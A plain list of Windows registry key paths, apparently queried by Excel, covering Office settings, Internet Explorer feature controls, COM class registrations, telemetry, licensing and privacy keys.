HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\FilePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TelemetryClientId
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Internet\WebServiceCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\Session
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableOfficeBetaHeader
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\EnableHttpAccessTypeAutomaticProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\RunBinaryControlHostProcessInSeparateAppContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Security\RunBinaryControlHostProcessInSeparateAppContainer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry\ViewerSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ViewerSettings
HKEY_CURRENT_USER\Software\Classes\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\Elevation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_queried
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_expiration
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry\Debug
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\Debug
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EcsRequestPending
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Floodgate
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Floodgate
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\ClientSamplingOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableTelemetryGrf
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableServerReachability
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\SchemaVersion
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\LicensingNext
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicensingNext
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\Licensing
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities
HKEY_CURRENT_USER\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\RetailDemo
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\ServicePlanFeatures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ServicePlanFeatures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LastUILang
HKEY_CURRENT_USER\Software\Policies\Microsoft\Shared
HKEY_CURRENT_USER\Software\Microsoft\Shared
HKEY_CURRENT_USER\Software\Microsoft\Shared\OfficeUILanguage
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\SendTelemetry
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\FRESettingsMigrated
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\16.0\Common\Privacy
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\ControllerConnectedServicesEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ControllerConnectedServicesStateTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SendTelemetryTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DeviceAccess
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\DisconnectedState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserContentDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DownloadContentDisabled
